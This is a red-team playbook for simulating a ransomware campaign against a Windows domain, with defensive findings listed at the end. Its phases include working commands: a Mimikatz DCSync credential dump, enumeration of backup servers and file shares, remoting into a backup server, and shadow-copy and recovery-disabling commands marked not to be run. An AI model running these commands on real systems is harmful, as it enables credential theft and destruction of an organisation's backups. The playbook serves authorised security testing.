Ransomware campaign simulation

End-to-end simulation of a modern triple-extortion ransomware campaign for red team exercises. Goal: demonstrate the full impact chain from initial access to extortion demand, identifying the points at which detection and response could have intervened.

Scope and prerequisites

  • Authorisation: explicit written scope covering destructive simulation (this exercise must be run in an isolated lab environment or with explicit approval for destructive actions in production)

  • Target environment: domain-joined Windows infrastructure with a backup server

  • Entry point: phishing or initial access obtained by prior phases

  • Success criteria: reach the backup infrastructure and demonstrate the ability to destroy it; deploy simulated ransomware note; document the full kill chain

Note: this playbook describes simulation techniques. No real ransomware binary is deployed; the payload drops a text file in place of encryption.

Phase 1: initial access and privilege escalation

# confirm current context
whoami /all
(Get-ADDomain).DNSRoot

# if not yet SYSTEM or Domain Admin, escalate
# common paths: service misconfiguration, unquoted path, Kerberoasting
# see the privilege escalation and crypto-attacks sections

# target: reach Domain Admin or a context that can access backup infrastructure
Invoke-Mimikatz -Command '"lsadump::dcsync /user:Administrator"'

Phase 2: map the environment before acting

# identify backup servers before taking any destructive action
# look for: Veeam, Rubrik, Commvault, Windows Server Backup, cloud backup agents
Get-ADComputer -Filter * -Properties Description |
  Where-Object { $_.Description -match 'backup|veeam|rubrik' }

# identify domain controllers (critical for understanding blast radius)
(Get-ADDomain).ReplicaDirectoryServers

# identify servers running backup services
Invoke-Command -ComputerName $computers -ScriptBlock {
    Get-Service | Where-Object { $_.DisplayName -match 'Veeam|Backup|Shadow' }
}

# identify volume shadow copies (recovery path)
vssadmin list shadows

Phase 3: exfiltrate before destroying (simulate)

In a real campaign, data is exfiltrated before any destructive action. In this simulation, document what data would have been exfiltrated:

# identify high-value data stores (do not actually exfiltrate in simulation)
Get-ChildItem -Path '\\FILESERVER\Finance\' -Recurse -File |
  Where-Object { $_.Extension -in '.xlsx','.pdf','.docx' } |
  Measure-Object -Property Length -Sum

# document: X GB of financial records accessible to Domain Admin identity
# in a real campaign, this would be collected and staged for exfiltration

Phase 4: demonstrate backup destruction capability (non-destructive)

# simulate backup destruction WITHOUT actually destroying anything
# confirm access to backup server
Enter-PSSession -ComputerName BACKUP_SERVER -Credential $domainAdmin

# confirm backup paths are accessible
Get-Item '\\BACKUP_SERVER\BackupRepository\' -ErrorAction SilentlyContinue

# confirm shadow copy deletion capability (do not actually run in simulation)
# vssadmin delete shadows /all /quiet  <- SIMULATION ONLY; DO NOT RUN
# bcdedit /set {default} recoveryenabled no  <- SIMULATION ONLY; DO NOT RUN

# document: Domain Admin access to backup infrastructure confirmed;
# backup destruction would succeed if authorised

Phase 5: deploy simulated ransomware note

In place of actual encryption, deploy a file that demonstrates the capability and documents what would have been encrypted:

# identify encryption targets
$targets = Get-ChildItem -Path C:\Users,\\FILESERVER\Shares -Recurse -File `
  -Include *.docx,*.xlsx,*.pdf,*.sql,*.vmdk -ErrorAction SilentlyContinue

$totalGB = ($targets | Measure-Object Length -Sum).Sum / 1GB

# drop a ransom note in each target directory (simulation)
$note = @"
[SIMULATION - RED TEAM EXERCISE]

This system has been accessed by the red team during an authorised engagement.

In a real campaign, $($targets.Count) files ($([math]::Round($totalGB, 2)) GB)
would have been encrypted.

Backup servers: [ACCESSIBLE - destruction capability confirmed]
Exfiltration: [WOULD HAVE OCCURRED PRIOR TO ENCRYPTION]

Engagement reference: [ENGAGEMENT_ID]
Contact: [RED_TEAM_CONTACT]
"@

$note | Out-File -FilePath C:\RANSOM_NOTE_SIMULATION.txt -Encoding UTF8

Phase 6: triple extortion simulation

Document the three extortion vectors that would be available:

Extortion vector 1 (data): [X] GB of sensitive data accessible and would have
been exfiltrated prior to this notification.

Extortion vector 2 (encryption): [X] files would have been encrypted.
Recovery via backup would not have been possible (backup destruction confirmed).

Extortion vector 3 (DDoS): external-facing services identified at [list URLs].
DDoS capability via rented botnet infrastructure would have been available.

Phase 7: document findings for report

Finding

Evidence

Severity

Domain Admin via [escalation path]

Mimikatz output

Critical

Backup infrastructure accessible to DA

PSSession to backup server confirmed

Critical

Volume shadow copies deletable

vssadmin access confirmed

Critical

[X] GB sensitive data accessible

File enumeration results

Critical

Exfiltration not detected during prior phases

No SIEM alert generated

Critical

No alert on Domain Admin login to backup server

Check SIEM logs

High

Defensive gaps this demonstrates

  • Time to detect domain admin activity: did the SOC alert?

  • Backup isolation: were backup servers accessible from a compromised domain admin account, or was there additional access control?

  • Shadow copy protection: was WORM or cloud-based backup in place?

  • Data classification: could the engagement team find sensitive data easily, or was it difficult to locate?

  • Exfiltration detection: were the prior exfiltration phases detected?

Counter moves

A ransomware campaign is the access battle made visible at the end. Tested offline backups, segmentation to bound how far encryption spreads, and rapid isolation decide the blast radius. The defender’s view is in the blue notes on limiting the blast radius.